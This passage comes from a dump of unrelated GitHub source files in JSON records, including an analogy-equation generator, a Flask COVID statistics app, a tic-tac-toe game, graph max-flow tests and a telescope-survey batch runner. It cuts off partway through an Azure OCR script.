generated equations\n :param fix_len: get only fixed length equations\n \"\"\"\n\n # List of generated equations\n gen_nlgs = []\n\n # Append normal form\n if is_within_len(nlg, str_len) and (not fix_len or is_fix_len(nlg, str_len)):\n gen_nlgs.append(nlg)\n\n mirrored_nlg = AnalogyEquation()\n for ratio_idx, str_idx in product([0, 1], [0, 1]):\n mirrored_nlg[ratio_idx][str_idx] = nlg[ratio_idx][str_idx][::-1]\n\n # Add to generated list\n if is_within_len(mirrored_nlg, str_len) and (not fix_len or is_fix_len(mirrored_nlg, str_len)):\n gen_nlgs.append(mirrored_nlg)\n\n return gen_nlgs\n\n\ndef gen_redup(nlg, str_len, fix_len=False):\n \"\"\"\n Reduplicate equations to maximum length\n :param nlg: an AnalogyEquation object\n :param str_len: length of all strings in generated equations\n :param fix_len: get only fixed length equations\n \"\"\"\n\n # List of generated equations\n gen_nlgs = []\n\n # Calculate maximum reduplication number\n max_redup = int(math.floor(min(str_len[0] / len(nlg[0][0]), str_len[1] / len(nlg[0][1]),\n str_len[2] / len(nlg[1][0]), str_len[3] / len(nlg[1][1]))))\n\n for redup_id in range(1, max_redup + 1):\n\n # Create a new AnalogyEquation\n duped_nlg = AnalogyEquation()\n\n for ratio_idx, str_idx in product([0, 1], [0, 1]):\n\n # Build new list of symbols = new string\n new_string = []\n for symbol in nlg[ratio_idx][str_idx]:\n new_string.extend([symbol] * redup_id)\n\n # Set new string to new AnalogyEquation\n duped_nlg[ratio_idx][str_idx] = new_string\n\n # Add to generated list\n if not fix_len or is_fix_len(duped_nlg, str_len):\n gen_nlgs.append(duped_nlg)\n\n return gen_nlgs\n\n\ndef gen_insert(nlg, str_len, fix_len=False):\n \"\"\"\n Inserting equations to maximum length\n :param nlg: an AnalogyEquation object\n :param str_len: length of all strings in generated equations\n :param fix_len: get only fixed length equations\n :return: list of inserted equations\n \"\"\"\n\n # List of generated equations\n gen_nlgs = []\n\n # Add non-modified equation\n if is_within_len(nlg, str_len) and \\\n (not fix_len or is_fix_len(nlg, str_len)):\n gen_nlgs.append(nlg)\n\n # If shortest word is shorter than 2, pass the inserting\n if min([len(nlg[0][0]), len(nlg[0][1]), len(nlg[1][0]), len(nlg[1][1])]) < 2:\n return gen_nlgs\n\n # Calculate maximum size of insertion\n max_ins = int(math.floor(min((str_len[0] - len(nlg[0][0])) / (len(nlg[0][0]) - 1),\n (str_len[1] - len(nlg[0][1])) / (len(nlg[0][1]) - 1),\n (str_len[2] - len(nlg[1][0])) / (len(nlg[1][0]) - 1),\n (str_len[3] - len(nlg[1][1])) / (len(nlg[1][1]) - 1))))\n\n # Perform inserting\n if max_ins > 0:\n\n # List of all characters in current equation\n curr_chr = set(nlg[0][0] + nlg[0][1] + nlg[1][0] + nlg[1][1])\n\n # Get unique insertion chars\n chr_str_id = ord('0')\n ins_chr = []\n while len(ins_chr) < max_ins:\n if chr(chr_str_id) not in curr_chr:\n ins_chr.append(chr(chr_str_id))\n chr_str_id += 1\n\n # Generate all insertion chunks (master list; distinct name so the loop variable below cannot shadow it)\n ins_chks = [[ins_chr[0]]]\n\n # Temporary list of previous length chunks\n prev_ins_chk = [[ins_chr[0]]]\n\n # Generate all the length of insert chunks\n for chr_id in range(1, max_ins):\n\n # Append a new character\n next_ins_chk = []\n for ins_chk in prev_ins_chk:\n for new_chr_id in range(len(set(ins_chk)) + 1):\n next_ins_chk.append(ins_chk + [ins_chr[new_chr_id]])\n\n # Add to final chunk list\n ins_chks.extend(next_ins_chk)\n\n # Set to previous list for next iteration\n prev_ins_chk = next_ins_chk\n\n # Finally, perform insertion\n for ins_chk in ins_chks:\n\n # New equation\n 
inserted_nlg = AnalogyEquation()\n\n # Insert chunk between characters\n for ratio_idx, str_idx in product([0, 1], [0, 1]):\n\n # New string (list of symbols)\n new_string = []\n\n # For each character add insertion chunk after it\n for char in nlg[ratio_idx][str_idx][:-1]:\n new_string.extend([char] + list(ins_chk))\n\n # Add last character to the end\n new_string.append(nlg[ratio_idx][str_idx][-1])\n\n # Set new string to object\n inserted_nlg[ratio_idx][str_idx] = new_string\n\n # Add to generated list\n if not fix_len or is_fix_len(inserted_nlg, str_len):\n gen_nlgs.append(inserted_nlg)\n\n return gen_nlgs\n\n\ndef gen_cast(nlg, str_len, fix_len=False):\n \"\"\"\n Casting equations to maximum length\n :param nlg: an AnalogyEquation object\n :param str_len: length of all strings in generated equations\n :param fix_len: get only fixed length equations\n :return: list of casted equations\n \"\"\"\n\n # Prefix character\n pre_chr = '<'\n\n # Suffix character\n suf_chr = '>'\n\n # List of generated equations\n gen_nlgs = []\n\n # Add non-modified equation\n if is_within_len(nlg, str_len) and \\\n (not fix_len or is_fix_len(nlg, str_len)):\n gen_nlgs.append(nlg)\n\n # Loop with early breaks\n for pre_a in range(str_len[0] - len(nlg[0][0]) + 1):\n for suf_a in range(str_len[0] - len(nlg[0][0]) - pre_a + 1):\n for pre_b in range(str_len[1] - len(nlg[0][1]) + 1):\n for suf_b in range(str_len[1] - len(nlg[0][1]) - pre_b + 1):\n for pre_c in range(max(0, pre_a - pre_b),\n str_len[2] - len(nlg[1][1]) + 1):\n pre_d = pre_c + pre_b - pre_a\n if pre_d + len(nlg[1][1]) > str_len[3]:\n continue\n\n for suf_c in range(str_len[2] - len(nlg[1][0]) - pre_c + 1):\n suf_d = suf_c + suf_b - suf_a\n if pre_d + len(nlg[1][1]) + suf_d > str_len[3]:\n continue\n\n # Sanity check (should always pass)\n if pre_a >= 0 and pre_b >= 0 and pre_c >= 0 and pre_d >= 0 and suf_a >= 0 and suf_b >= 0 \\\n and suf_c >= 0 and suf_d >= 0 and pre_d + len(nlg[1][1]) + suf_d <= str_len[3]:\n\n # New equation\n casted_nlg = AnalogyEquation()\n\n casted_nlg[0][0] = ([pre_chr] * pre_a) + nlg[0][0] + ([suf_chr] * suf_a)\n casted_nlg[0][1] = ([pre_chr] * pre_b) + nlg[0][1] + ([suf_chr] * suf_b)\n casted_nlg[1][0] = ([pre_chr] * pre_c) + nlg[1][0] + ([suf_chr] * suf_c)\n casted_nlg[1][1] = ([pre_chr] * pre_d) + nlg[1][1] + ([suf_chr] * suf_d)\n\n # Add to generated list\n if not fix_len or is_fix_len(casted_nlg, str_len):\n gen_nlgs.append(casted_nlg)\n\n return gen_nlgs\n\n\n###############################################################################\n\ndef gen_fixed_len_nlgs_worker(nlg, method, str_len, fix_len):\n \"\"\"\n Generate fixed length equations based on single equation\n :param nlg: an AnalogyEquation object\n :param method: forwarding method\n :param str_len: forwarding str_len\n :param fix_len: forwarding fix_len\n \"\"\"\n\n gen_nlgs = []\n\n if method == 'r': # Reduplicating\n gen_nlgs = gen_redup(nlg, str_len, fix_len)\n elif method == 'p': # Permuting\n gen_nlgs = gen_permute(nlg, str_len, fix_len)\n elif method == 'm': # Mirroring\n gen_nlgs = gen_mirror(nlg, str_len, fix_len)\n elif method == 'i': # Inserting\n gen_nlgs = gen_insert(nlg, str_len, fix_len)\n elif method == 'c': # Casting\n gen_nlgs = gen_cast(nlg, str_len, fix_len)\n\n return gen_nlgs\n\n\ndef gen_fixed_len_nlgs(nlgs, str_len, output=None, methods='pmric', var_length=False, verbose=False,\n threads=multiprocessing.cpu_count()):\n \"\"\"\n Generate fixed length equations based on nlgs and print out the output\n :param nlgs: list of AnalogyEquation 
objects\n :param str_len: length of strings in generated equations\n :param output: forwarding args.output\n :param methods: forwarding args.methods\n :param var_length: forwarding args.var_length\n :param verbose: forwarding args.verbose\n :param threads: forwarding args.threads\n \"\"\"\n\n if verbose:\n print('Generate to length: {0} {1} {2} {3}'.format(*str_len), file=sys.stderr)\n print('Start generating equations', file=sys.stderr)\n\n # Multi-processing\n pool = None\n if threads > 1:\n pool = multiprocessing.Pool(threads)\n\n # If input AnalogyAlignment(s), strip into AnalogyEquation(s)\n if type(nlgs) == AnalogyAlignment:\n nlgs = [nlg_alg.nlg for nlg_alg in nlgs]\n\n gen_all_nlgs = []\n for nlg in nlgs:\n\n if verbose:\n print('Generate from: {}'.format(nlg), file=sys.stderr)\n\n # Initial list\n gen_prev_nlgs = [nlg]\n\n # Loop method\n for method_id, method in enumerate(list(methods)):\n\n # If last method, enable fix length filter\n if method_id == len(methods) - 1 and not var_length:\n fix_len = True\n else:\n fix_len = False\n\n # Print method id and name\n if verbose:\n if method == 'p':\n print('{}. Permuting'.format(method_id + 1), file=sys.stderr)\n elif method == 'm':\n print('{}. Mirroring'.format(method_id + 1), file=sys.stderr)\n elif method == 'r':\n print('{}. Reduplicating'.format(method_id + 1), file=sys.stderr)\n elif method == 'i':\n print('{}. Inserting'.format(method_id + 1), file=sys.stderr)\n elif method == 'c':\n print('{}. Casting'.format(method_id + 1), file=sys.stderr)\n\n # Send list to generation worker\n gen_tmp_nlgs = []\n\n if threads > 1:\n for gen_wrk_nlgs in pool.starmap(gen_fixed_len_nlgs_worker,\n zip(gen_prev_nlgs, repeat(method), repeat(str_len), repeat(fix_len))):\n gen_tmp_nlgs.extend(gen_wrk_nlgs)\n else:\n for prev_nlg in gen_prev_nlgs:\n gen_tmp_nlgs.extend(gen_fixed_len_nlgs_worker(prev_nlg, method, str_len, fix_len))\n\n gen_prev_nlgs = gen_tmp_nlgs\n\n # Trigger garbage collection\n del gen_tmp_nlgs\n\n # Filter unique analogies\n gen_prev_nlgs = list(set(gen_prev_nlgs))\n\n # Print generation output\n if verbose:\n print(' - Number of equations: {}'.format(len(gen_prev_nlgs)), file=sys.stderr)\n\n gen_all_nlgs.extend(gen_prev_nlgs)\n\n # Filter unique generated analogies\n gen_all_nlgs = list(set(gen_all_nlgs))\n if verbose:\n print('Filtered generated analogies: {}'.format(len(gen_all_nlgs)), file=sys.stderr)\n\n # Create output stream (To file or stdout)\n out_file = None\n if output == 'sys.stdout':\n out_file = sys.stdout\n elif output is not None:\n if '.gz' in output:\n out_file = gzip.open(output, 'wt', encoding='utf8')\n else:\n out_file = open(output, 'w', encoding='utf8')\n\n # Print all out\n if out_file is not None:\n for nlg in gen_all_nlgs:\n print(nlg, file=out_file)\n\n # Close output file\n if out_file is not None and out_file != sys.stdout:\n out_file.close()\n\n # Garbage collecting (pool only exists in multi-thread mode)\n if pool is not None:\n pool.close()\n del pool\n\n return gen_all_nlgs\n\n\n###############################################################################\n\ndef main():\n # Start timer\n start_time = time.time()\n\n # Read equations\n nlgs = read_nlg_file(args.file)\n\n # Generate analogies & print output\n if len(args.length) == 1:\n args.length = (args.length[0],) * 4\n gen_fixed_len_nlgs(nlgs, args.length, args.output, args.methods, args.var_length, args.verbose, args.threads)\n\n if args.verbose:\n print(' - Execution time: {0:.2f} sec'.format(time.time() - start_time), file=sys.stderr)\n\n\nif __name__ == '__main__':\n args = read_argv()\n 
main()\n","repo_name":"goodyttoor/Neural-Analogy-Solver","sub_path":"neural_nlg_solver/nlg_generator.py","file_name":"nlg_generator.py","file_ext":"py","file_size_in_byte":21537,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21019722686","text":"class ScheduleCreator:\n def __init__(self,FoundClassObjList,generalPreferences,classList):\n self.FCobjList = FoundClassObjList\n self.generalPreferences = generalPreferences\n self.classList = classList\n self.neededCourses = self.getNeededClasses()\n print(self.neededCourses)\n\n def getNeededClasses(self):\n neededCourses = []\n for neededClass in self.classList:\n tempList = []\n tempList.append(neededClass[\"cn\"])\n tempList.append(neededClass[\"cc\"])\n neededCourses.append(tempList)\n return neededCourses\n #self.neededCourses = neededCourses\n\n def convertTime(self,time):\n try:\n #print(\"here\")\n hour = int(time[:2])\n meridian = time[6:]\n min = time[3:5]\n except:\n hour = int(time[:1])\n meridian = time[5:]\n min = time[2:4]\n #print(hour)\n #print(min)\n\n #meridian = time[5:]\n #meridian = time[:2]\n # Special-case '12AM' -> 0, '12PM' -> 12 (not 24)\n if (hour == 12):\n hour = 0\n if (meridian == 'PM'):\n hour += 12\n return [hour,min]\n\n\n def compareTimes(self,begin_time,end_time,check_time):\n #returns true/false\n check_time = check_time #or datetime.utcnow().time()\n if begin_time < end_time:\n return check_time >= begin_time and check_time <= end_time\n else: # crosses midnight\n return check_time >= begin_time or check_time <= end_time\n\n\n def checkMostIdeal(self):\n mostIdealCourses = []\n #index = 0\n for classType in self.FCobjList:\n #print(classType)\n for course in classType.foundClasses:\n #print(course)\n if course[\"accuracyList\"][0][\"status\"]:\n print(\"Most Ideal Course Found\")\n #index+=1\n mostIdealCourses.append([course,classType.subject,classType.courseCode])\n\n else:\n #index+=1\n print(\"Not a most Ideal course\")\n #print(False)\n #print(course[\"accuracyList\"][0])\n #if course[\"accuracyList\"][0]:\n #pass\n #print(course)\n #if(course.)\n self.mostIdealCourses = mostIdealCourses\n print(self.mostIdealCourses)\n #print(index)\n def createScheds(self):\n #print(self.mostIdealCourses)\n schedLists = []\n\n classSubjects =[]\n\n tempList=[]\n print(\"\\n\\n\")\n for foundClass in self.mostIdealCourses:\n #print(\"\\n\\n\")\n #print(foundClass)\n #print(\"\\n\\n\")\n addedClasses = []\n if foundClass in tempList:\n #pass\n print(\"AlreadyInList\")\n else:\n index=0\n for tempClass in tempList:\n #not running\n print(\"------------------------------------------------\")\n print(index)\n print(foundClass[1])\n print(tempClass)\n print(\"------------------------------------------------\")\n index+=1\n if(foundClass[1]) == tempClass[1]:\n print(\"Course Code already in List\")\n addedClasses.append(foundClass[1])\n if foundClass[1] not in addedClasses:\n tempList.append(foundClass[1])\n print(tempList)\n\n\n #print(\"AlreadyInList\")\n #if condition:\n #pass\n #print(foundClass)\n #foundClass.check_time()\n\n\n #out of for loop\n","repo_name":"AlexPetmecky/auto-register","sub_path":"version2/classes/ScheduleCreator.py","file_name":"ScheduleCreator.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32836389820","text":"import haiku as hk\nfrom jax import nn\n\nfrom policies_disc.networks.network import Network\n\n\nclass 
Dueling(Network):\n def __call__(self, state):\n info = {}\n x = state\n info['input'] = x\n for i, width in enumerate(self.structure):\n name = f'layer{i}'\n x = hk.Linear(width, w_init=self.init, name=name)(x)\n if self.num_groups:\n x = hk.GroupNorm(self.num_groups, axis=-1, create_scale=False, create_offset=False, name=f'{name}_nosn_ln')(x)\n\n info[name] = x\n x = nn.relu(x)\n\n pre_value = hk.Linear(256, w_init=self.init, name='pre_value')(x)\n if self.num_groups:\n pre_value = hk.GroupNorm(self.num_groups, axis=-1, create_scale=False, create_offset=False, name=f'prevalue_nosn_ln')(pre_value)\n pre_value = nn.relu(pre_value)\n value = hk.Linear(1, w_init=self.init, name='value', with_bias=False)(pre_value)\n\n pre_advantage = hk.Linear(256, w_init=self.init, name='pre_advantage')(x)\n if self.num_groups:\n pre_advantage = hk.GroupNorm(self.num_groups, axis=-1, create_scale=False, create_offset=False, name=f'preadvantage_nosn_ln')(pre_advantage)\n pre_advantage = nn.relu(pre_advantage)\n advantage = hk.Linear(self.action_dim, w_init=self.init, name='advantage', with_bias=False)(pre_advantage)\n\n info['value'] = value\n info['advantage'] = advantage\n info['q'] = value + advantage - advantage.mean(-1, keepdims=True)\n return info\n","repo_name":"dyth/doublegum","sub_path":"policies_disc/networks/dueling.py","file_name":"dueling.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"16520270046","text":"from graph import Graph\nfrom graph_parser import graph_parser\n\n\ndef test_FF():\n graph = [\n [0, 16, 13, 0, 0, 0],\n [0, 0, 10, 12, 0, 0],\n [0, 4, 0, 0, 14, 0],\n [0, 0, 9, 0, 0, 20],\n [0, 0, 0, 7, 0, 4],\n [0, 0, 0, 0, 0, 0],\n ]\n\n for i in range(len(graph)):\n for j in range(len(graph[i])):\n graph[i][j] = [graph[i][j], 0]\n\n g = Graph()\n g.add_matrix(graph)\n g.set_source_sink(0, 5)\n g.add_vertex_names([\"S\", \"A\", \"B\", \"C\", \"D\", \"T\"])\n g._add_og_edge([0, 1])\n g._add_og_edge([0, 2])\n g._add_og_edge([1, 2])\n g._add_og_edge([1, 3])\n g._add_og_edge([2, 1])\n g._add_og_edge([2, 4])\n g._add_og_edge([3, 2])\n g._add_og_edge([3, 5])\n g._add_og_edge([4, 3])\n g._add_og_edge([4, 5])\n max_flow, matrix = g.FordFulkerson()\n print(max_flow)\n print_matrix([\"S\", \"A\", \"B\", \"C\", \"D\", \"T\"], matrix)\n print_matrix([\"S\", \"A\", \"B\", \"C\", \"D\", \"T\"], g.reverse_flow(matrix))\n\n\ndef print_matrix(vertex_names, ad_matrix):\n print(vertex_names)\n for i in range(len(vertex_names)):\n print(vertex_names[i], ad_matrix[i][: len(vertex_names)])\n\n\ndef test_valid_flow1():\n g = graph_parser(\"example_video.txt\")\n valid, matrix = g.valid_flow()\n print(valid)\n if not valid:\n return\n print_matrix([\"S\", \"T\", \"A\", \"B\", \"C\", \"D\", \"S*\", \"T*\"], matrix)\n print_matrix([\"S\", \"T\", \"A\", \"B\", \"C\", \"D\"], g.get_just_og_edges(matrix))\n\n\ndef test_valid_flow2():\n graph = [[0, 4, 0, 0], [0, 0, 2, 0], [0, 0, 0, 5], [0, 0, 0, 0]]\n\n for i in range(len(graph)):\n for j in range(len(graph[i])):\n graph[i][j] = [graph[i][j], 0]\n\n graph[0][1][1] = 1 # change this number to 3 to see the invalid flow\n\n g = Graph()\n g.add_matrix(graph)\n g.set_source_sink(0, 3)\n g._add_og_edge([0, 1])\n g._add_og_edge([1, 2])\n g._add_og_edge([2, 3])\n g.add_vertex_names([\"S\", \"A\", \"B\", \"T\"])\n valid, matrix = g.valid_flow()\n print(valid)\n if not valid:\n return\n print_matrix([\"S\", \"A\", \"B\", \"T\", \"S*\", \"T*\"], matrix)\n 
print_matrix([\"S\", \"A\", \"B\", \"T\"], g.get_just_og_edges(matrix))\n\n\ndef test_max_flow():\n g = graph_parser(\"example_video.txt\")\n print(\"MATRIZ OG\")\n g.print_matrix()\n max_flow, matrix = g.max_flow()\n print(max_flow)\n if max_flow != -1:\n print_matrix(g.get_vertex_names(), matrix)\n\n\ntest_valid_flow1()\n# test_valid_flow2()\n# test_FF()\n# test_max_flow()\n","repo_name":"ArmandoCivini/TDA_TP3","sub_path":"test_FF.py","file_name":"test_FF.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43495686974","text":"from flask import Flask, render_template,abort,request\nimport json\nimport os\nimport requests\napp = Flask(__name__)\nurl_base=\"https://covid-api.mmediagroup.fr/v1/\"\nurl_base1=\"https://restcountries.eu/rest/v2/name/\"\nurl_base2=\"https://restcountries.eu/rest/v2/alpha/\"\n@app.route('/',methods=[\"GET\"])\ndef inicio():\n\treturn render_template(\"inicio.html\")\n\n@app.route('/buscar_pais',methods=[\"GET\",\"POST\"])\ndef buscar_pais():\n nombre_pais=request.form.get(\"nombre\")\n if request.method == \"GET\":\n return render_template(\"buscar_pais.html\", nombre_pais=nombre_pais)\n else:\n r1=requests.get(url_base1+nombre_pais)\n if r1.status_code==200:\n parametros={\"country\":nombre_pais}\n r=requests.get(url_base+'/cases',params=parametros)\n doc=r.json()\n confirmados=doc.get(\"All\").get(\"confirmed\")\n recuperados=doc.get(\"All\").get(\"recovered\")\n muertos=doc.get(\"All\").get(\"deaths\")\n poblacion=doc.get(\"All\").get(\"population\")\n return render_template(\"buscar_pais.html\",nombre_pais=nombre_pais,confirmados=confirmados,recuperados=recuperados,muertos=muertos,poblacion=poblacion)\n else:\n return abort(404)\n\n@app.route('/buscar_ciudad',methods=[\"GET\",\"POST\"])\ndef buscar_ciudad():\n nombre_pais=request.form.get(\"nombre\")\n nombre_ciudad=request.form.get(\"nombre1\")\n if request.method == \"GET\":\n return render_template(\"buscar_ciudad.html\",nombre_ciudad=nombre_ciudad, nombre_pais=nombre_pais)\n else:\n parametros={\"country\":nombre_pais}\n r=requests.get(url_base+'/cases',params=parametros)\n doc=r.json()\n confirmados=doc.get(nombre_ciudad).get(\"confirmed\")\n recuperados=doc.get(nombre_ciudad).get(\"recovered\")\n muertos=doc.get(nombre_ciudad).get(\"deaths\")\n return render_template(\"buscar_ciudad.html\",nombre_ciudad=nombre_ciudad,nombre_pais=nombre_pais,confirmados=confirmados,recuperados=recuperados,muertos=muertos)\n\n@app.route('/buscar_iniciales',methods=[\"GET\",\"POST\"])\ndef buscar_iniciales():\n inicial=request.form.get(\"nombre\")\n if request.method == \"GET\":\n return render_template(\"buscar_iniciales.html\", inicial=inicial)\n else:\n r1=requests.get(url_base2+inicial)\n if r1.status_code==200:\n parametros={\"ab\":inicial}\n r=requests.get(url_base+'/cases',params=parametros)\n doc=r.json()\n confirmados=doc.get(\"All\").get(\"confirmed\")\n recuperados=doc.get(\"All\").get(\"recovered\")\n muertos=doc.get(\"All\").get(\"deaths\")\n poblacion=doc.get(\"All\").get(\"population\")\n return render_template(\"buscar_iniciales.html\",inicial=inicial,confirmados=confirmados,recuperados=recuperados,muertos=muertos,poblacion=poblacion)\n else:\n return abort(404)\nport=os.environ[\"PORT\"]\napp.run('0.0.0.0', int(port), 
debug=True)\n","repo_name":"Omarelhani1/api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6029471796","text":"from tkinter import *\nimport random\n\ndef next_turn(row, column):\n global player\n \n if buttons[row][column]['text'] == '' and check_winner() is False:\n \n if player == players[0]:\n buttons[row][column]['text'] = player \n \n if check_winner() is False:\n player = players[1]\n turn_label.config(text=players[1]+' Turn', bg = 'blue')\n \n elif check_winner() is True:\n turn_label.config(text =players[0]+ \" Wins\")\n \n elif check_winner() == \"Tie!\":\n turn_label.config(text = \"Tie!\") \n \n else:\n buttons[row][column]['text'] = player \n if check_winner() is False:\n player = players[0]\n turn_label.config(text=players[0]+' Turn', bg = 'red')\n \n elif check_winner() is True:\n turn_label.config(text = players[1]+\" Wins\")\n \n elif check_winner() == \"Tie!\":\n turn_label.config(text = \"Tie!\") \n \n \ndef check_winner():\n for row in range(3):\n if buttons[row][0]['text'] == buttons[row][1]['text'] == buttons[row][2]['text'] != \"\":\n buttons[row][0].config(bg='green')\n buttons[row][1].config(bg='green')\n buttons[row][2].config(bg='green')\n return True\n \n for column in range(3):\n if buttons[0][column]['text'] == buttons[1][column]['text'] == buttons[2][column]['text'] != \"\":\n buttons[0][column].config(bg='green')\n buttons[1][column].config(bg='green')\n buttons[2][column].config(bg='green')\n return True\n \n if buttons[0][0]['text'] == buttons[1][1]['text'] == buttons[2][2]['text'] != \"\":\n buttons[0][0].config(bg='green')\n buttons[1][1].config(bg='green')\n buttons[2][2].config(bg='green')\n return True\n\n elif buttons[0][2]['text'] == buttons[1][1]['text'] == buttons[2][0]['text'] != \"\":\n buttons[0][2].config(bg='green')\n buttons[1][1].config(bg='green')\n buttons[2][0].config(bg='green')\n return True\n\n elif empty_space() is False:\n for row in range(3):\n for column in range(3):\n buttons[row][column].config(bg='yellow')\n return \"Tie!\"\n\n else:\n return False\n\n\ndef empty_space():\n spaces = 9\n for row in range(3):\n for column in range(3):\n if buttons[row][column]['text'] != '':\n spaces -= 1\n \n if spaces == 0:\n return False\n else:\n return True\n \n\ndef new_game():\n global player \n player = random.choice(players)\n if player == 'X':\n turn_label.config(text = player+\" turn\", bg = 'red')\n else:\n turn_label.config(text = player+\" turn\", bg = 'blue')\n for row in range(3):\n for column in range(3):\n buttons[row][column].config(text='', bg='white')\n \n\nwindow = Tk()\nwindow.title('Tic Tac Toe')\nwindow_width = 400\nwindow_height = 400\nscreen_width = window.winfo_screenwidth()\nscreen_height = window.winfo_screenheight()\nx = int(screen_width/2 - window_width/2)\ny = int(screen_height/2 - window_height/2)\nwindow.geometry(f\"{window_width}x{window_height}+{x}+{y}\")\n\nplayers = ['X', 'O']\nplayer = random.choice(players)\nbuttons = [[0, 0, 0],\n [0, 0, 0],\n [0, 0, 0]]\n\nif player == 'X':\n turn_label = Label(window, text = player + ' turn', font = ('Arial', 12), bg = 'red') \nelse:\n turn_label = Label(window, text = player + ' turn', font = ('Arial', 12), bg = 'blue') \n \nturn_label.pack()\n\nreset_button = Button(window, text = \"Restart the game\", font=('Arial', 12), command=new_game)\nreset_button.pack(side='bottom')\n\nframe = Frame(window, width = 10, 
height = 10)\nframe.pack()\n\n\nfor row in range(3):\n for column in range(3):\n buttons[row][column] = Button(frame, text = \"\", font = ('Arial', 12), width=6, height=3,\n command = lambda row = row, column = column:next_turn(row, column), bg='white')\n buttons[row][column].grid(row=row, column=column)\n\nwindow.mainloop()","repo_name":"alirezaXthm/Tic-Tac-Toe","sub_path":"tic.py","file_name":"tic.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73151141227","text":"from django.contrib import admin\nfrom . import views\nfrom django.urls import path\n\nurlpatterns = [\n path('', views.store, name=\"store\"),\n path('cart/', views.cart, name=\"cart\"),\n path('checkout/', views.checkout, name=\"checkout\"),\n path('update_item/', views.update_item, name=\"update_item\"),\n path('delete_item/', views.delete_item, name=\"delete_item\"),\n path('register/', views.registerPage, name=\"register\"),\n path('login/', views.loginPage, name=\"login\"),\n path('logout/', views.logoutUser, name=\"logout\"),\n path('update_cart/', views.update_cart, name=\"update_cart\"),\n path('ship/', views.fill_ship, name=\"ship\"),\n path('search/', views.search, name=\"search\"),\n]\n","repo_name":"CuongLoPTIT99/MyDjango","sub_path":"Django_Pro/ecommerce/store/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"780482867","text":"__all__ = (\"scimaf_dir\",)\n\nimport argparse\nimport glob\nimport os\nimport shutil\nimport sqlite3\nimport warnings\n\nimport matplotlib\nimport pandas as pd\n\nmatplotlib.use(\"Agg\")\n\nfrom . import batches as batches\nfrom . import db as db\nfrom . 
import metricBundles as mb\n\n\ndef scimaf_dir():\n \"\"\"Run the science batch on all .db files in a directory.\"\"\"\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--db\", type=str, default=None)\n parser.add_argument(\n \"--no_clobber\",\n dest=\"no_clobber\",\n action=\"store_false\",\n help=\"Do not remove existing directory outputs\",\n )\n parser.set_defaults(no_long_micro=False)\n parser.add_argument(\"--limited\", dest=\"limited\", action=\"store_true\")\n parser.set_defaults(limited=False)\n args = parser.parse_args()\n\n if args.db is None:\n db_files = glob.glob(\"*.db\")\n db_files = [filename for filename in db_files if \"trackingDb\" not in filename]\n else:\n db_files = [args.db]\n run_names = [os.path.basename(name).replace(\".db\", \"\") for name in db_files]\n\n for filename, name in zip(db_files, run_names):\n out_dir = name + \"_sci\"\n\n # Grab the starting date for the Presto KNe metric\n try:\n con = sqlite3.connect(filename)\n mjd0_df = pd.read_sql(\"select min(observationStartMJD) from observations;\", con)\n con.close()\n mjd0 = mjd0_df.values.min()\n # If this fails for any reason (aka schema change)\n except:\n warnings.warn(\"Could not find survey start date for Presto KNe, setting mjd0=None.\")\n mjd0 = None\n # Clobber output directory if it exists\n if not args.no_clobber:\n if os.path.isdir(out_dir):\n shutil.rmtree(out_dir)\n results_db = db.ResultsDb(out_dir=out_dir)\n # Set up the metricBundles\n if args.limited:\n bdict = batches.radar_limited(\n runName=name,\n mjd0=mjd0,\n )\n else:\n bdict = batches.science_radar_batch(\n runName=name,\n mjd0=mjd0,\n )\n # Run them, including generating plots\n group = mb.MetricBundleGroup(\n bdict, filename, out_dir=out_dir, results_db=results_db, save_early=False\n )\n group.run_all(clear_memory=True, plot_now=True)\n results_db.close()\n db.add_run_to_database(\n out_dir,\n \"trackingDb_sqlite.db\",\n run_group=None,\n run_name=name,\n run_comment=None,\n maf_comment=\"ScienceRadar\",\n db_file=name + \".db\",\n )\n","repo_name":"lsst/rubin_sim","sub_path":"rubin_sim/maf/scimaf_dir.py","file_name":"scimaf_dir.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"37"} +{"seq_id":"10755758852","text":"\nimport json\nimport time\n\n\nfrom azure.cognitiveservices.vision.computervision import ComputerVisionClient\nfrom azure.cognitiveservices.vision.computervision.models import OperationStatusCodes\nfrom msrest.authentication import CognitiveServicesCredentials\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\nimport streamlit as st\n\n\nwith open('secret.json') as f:\n secret = json.load(f)\n\nsubscription_key = secret['subscription_key']\nendpoint = secret['endpoint']\n\ncomputervision_client = ComputerVisionClient(endpoint,\n CognitiveServicesCredentials(subscription_key))\n\n\ndef call_api_with_image(filepath):\n local_image = open(filepath, \"rb\")\n recognize_results = computervision_client.read_in_stream(\n local_image, raw=True)\n operation_location_local = recognize_results.headers[\"Operation-Location\"]\n operation_id_local = operation_location_local.split(\"/\")[-1]\n\n while True:\n recognize_result = computervision_client.get_read_result(\n operation_id_local)\n if recognize_result.status.lower() not in ['notstarted', 'running']:\n break\n print('Waiting for result...')\n time.sleep(10)\n\n if recognize_result.status == OperationStatusCodes.succeeded:\n for text_result in 
